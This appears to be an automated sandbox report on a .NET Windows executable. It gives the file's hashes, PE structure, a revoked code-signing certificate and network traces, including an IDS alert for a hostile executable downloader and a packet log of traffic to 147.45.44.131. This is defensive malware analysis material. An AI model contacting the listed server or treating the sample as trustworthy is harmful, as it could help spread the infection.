TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	MiJZ3z4t5K.exe
File size:	307'736 bytes
MD5:	7184ee339fc221d742067dccff4cdfe2
SHA1:	0019c9c084a2756b4ec962d92ce56c526527df31
SHA256:	0a5d8601aff94ec2960ba5487d120e4f2952bf8b8cf9cd36873bf941721d67c4
SHA512:	667edefdf9b231a81b15637167e8cfb343f2f71dc39e11131071c27b2eb9cf18833d2007a8ebc816f6e1b6cfabf1e92a3b921400b2503ccd168f7b2f310a6853
SSDEEP:	768:2AGieBi5NiTvT0EBDtvIcLiniCcEYZBAvYcV69izhc6kFu2Ku:26eBi7iTvPzIc+cEYkp69izy6kF7Ku
TLSH:	DF642CCDCC51A113CBD245F16AEA9C85AB3ABE4C0C157C922A0D96C35953B88B437DFB
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....->..........."...0......v.......:... ...@....@.. ..............................th....`................................

File Icon


Icon Hash:	15326996cc69732f

Static PE Info

General

Entrypoint:	0x403a92
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xF33E2DE9 [Mon Apr 27 02:01:13 2099 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=SSL.com EV Code Signing Intermediate CA RSA R3, O=SSL Corp, L=Houston, S=Texas, C=US
Signature Validation Error:	A certificate was explicitly revoked by its issuer
Error Number:	-2146762484
Not Before, Not After	25/08/2024 11:49:24 24/08/2025 10:01:34
Subject Chain	OID.1.3.6.1.4.1.311.60.2.1.3=CN, OID.2.5.4.15=Private Organization, CN="Sichuan WCHX Technology Co., Ltd.", SERIALNUMBER=91510100332110126P, O="Sichuan WCHX Technology Co., Ltd.", L=Chengdu, S=Sichuan, C=CN
Version:	3
Thumbprint MD5:	07EB5AD552D8E5265C52846F5A25BDBF
Thumbprint SHA-1:	E29087AE930AC9BE77E22904EFE6416FE006F931
Thumbprint SHA-256:	BED79B8BC47E3679E8B19E9DADC7758614EE9619B2714226BC6201544DDA5BF3
Serial:	2351DDAF31CAFC1F6263F6E433B54E43

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3a40	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x4000	0x47278	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x49400	0x1e18	.rsrc
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x4c000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x3a24	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x1a98	0x1c00	b701d34a11ea00e040910215cb91c22b	False	0.48716517857142855	data	5.263537004738203	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x4000	0x47278	0x47400	bbabc228cad047c3dbf891b34f5f96ef	False	0.05999862938596491	data	3.641107878918316	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x4c000	0xc	0x200	3f947b09ae65eafbfb10f1f9ff175104	False	0.044921875	data	0.08153941234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x4160	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	0.37943262411347517
RT_ICON	0x45d8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	0.2178705440900563
RT_ICON	0x5690	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	0.18329875518672198
RT_ICON	0x7c48	0x42028	Device independent bitmap graphic, 256 x 512 x 32, image size 0	0.04381306033079859
RT_GROUP_ICON	0x49c80	0x3e	data	0.7903225806451613
RT_VERSION	0x49cd0	0x466	data	0.3845470692717584
RT_MANIFEST	0x4a148	0x112a	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.40259444697314517

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-05T11:39:59.350316+0100	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	2	192.168.2.6	49708	147.45.44.131	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 5, 2024 11:39:57.894325018 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:39:58.014077902 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:58.016969919 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:39:58.126005888 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:39:58.245826960 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.297185898 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.350316048 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:39:59.396173954 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.396188974 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.396258116 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:39:59.438129902 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.438143969 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.438225985 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:39:59.467051029 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.515882969 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.515898943 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.515911102 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.515964985 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:39:59.515994072 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:39:59.517532110 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.524414062 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.524471998 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:39:59.527745008 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.531147957 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.531160116 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.531215906 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:39:59.534533978 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.534548044 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.534615993 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:39:59.558056116 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.558114052 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:39:59.558870077 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.562326908 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.563096046 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.563142061 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:39:59.635799885 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.637324095 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.640136003 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.640191078 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:39:59.640891075 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.640938997 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:39:59.648722887 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.649519920 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.653023005 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:39:59.657258987 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.658111095 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.658154964 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:39:59.666290045 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.666800976 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.666855097 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:39:59.674516916 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.675251961 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.675302982 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:39:59.683017969 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.684348106 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.684398890 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:39:59.691629887 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.692409039 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.692950010 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:39:59.700191975 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.700975895 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.701030970 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:39:59.708890915 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.709589958 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.709670067 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:39:59.717422962 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.718353033 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.718408108 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:39:59.725960970 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.726847887 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.726898909 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:39:59.734575033 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.735397100 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.735454082 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:39:59.759988070 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.760706902 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.760775089 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:39:59.764380932 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.765031099 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.769037962 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:39:59.774379015 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.775171995 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.775245905 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:39:59.781425953 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.782377958 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.782445908 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:39:59.789107084 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.789874077 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.792936087 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:39:59.796848059 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.797595024 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.797668934 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:39:59.804171085 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.804949045 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.805013895 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:39:59.811214924 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.812041998 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.812120914 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:39:59.817943096 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.818785906 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.818842888 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:39:59.824696064 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.825525045 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.828917980 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:39:59.831022024 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.831811905 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.832957029 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:39:59.837367058 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.837969065 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.838031054 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:39:59.842622042 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.843275070 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.843342066 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:39:59.856990099 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.857789040 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.857870102 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:39:59.858355999 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.859678030 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.861008883 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:39:59.863065958 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.863950014 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.864938974 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:39:59.867636919 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.868443966 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.868969917 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:39:59.872251987 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.873039007 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.876940966 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.876993895 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:39:59.877712965 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.881316900 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:39:59.881563902 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.882334948 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.885123968 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:39:59.886202097 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.887038946 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.888921022 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:39:59.890878916 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.891652107 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.893062115 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:39:59.894213915 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.895065069 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.896974087 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:39:59.897558928 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.898365974 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.900959015 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.901133060 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:39:59.901726961 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.904380083 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.904469013 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:39:59.905131102 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.907764912 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.907824039 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:39:59.908550024 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.908595085 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:39:59.911292076 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.911983013 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.912810087 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:39:59.914484024 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.915275097 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.915330887 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:39:59.917855978 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.918642044 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.918699026 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:39:59.921241045 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.922022104 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.922071934 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:39:59.924753904 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.925441980 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.927993059 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.928057909 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:39:59.928738117 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.928800106 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:39:59.931281090 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.932075024 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.932128906 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:39:59.934577942 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.935353041 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.935411930 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:39:59.937861919 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.938555956 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.938606977 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:39:59.941005945 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.941785097 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.944233894 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.944289923 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:39:59.945233107 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.947405100 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.947458982 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:39:59.948507071 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.948561907 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:39:59.950512886 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.951564074 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.951615095 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:39:59.954046011 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.954885006 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.954936981 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:39:59.956832886 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.957895041 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.959947109 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.960001945 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:39:59.960910082 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.960959911 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:39:59.963052988 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.964025974 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:39:59.964077950 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:39:59.966069937 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.022151947 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.049108028 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.050026894 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.050100088 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.051521063 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.052171946 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.052223921 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.053700924 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.055248022 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.055262089 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.055308104 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.058312893 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.058331966 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.058367014 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.061400890 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.061414957 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.061455011 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.064865112 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.064879894 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.064939976 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.067543030 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.067557096 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.067600965 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.070914984 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.070929050 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.070969105 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.074315071 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.074328899 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.074367046 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.077590942 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.077617884 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.077656031 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.080888033 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.080903053 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.080955982 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.084141016 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.084156990 CET	80	49708	147.45.44.131	192.168.2.6
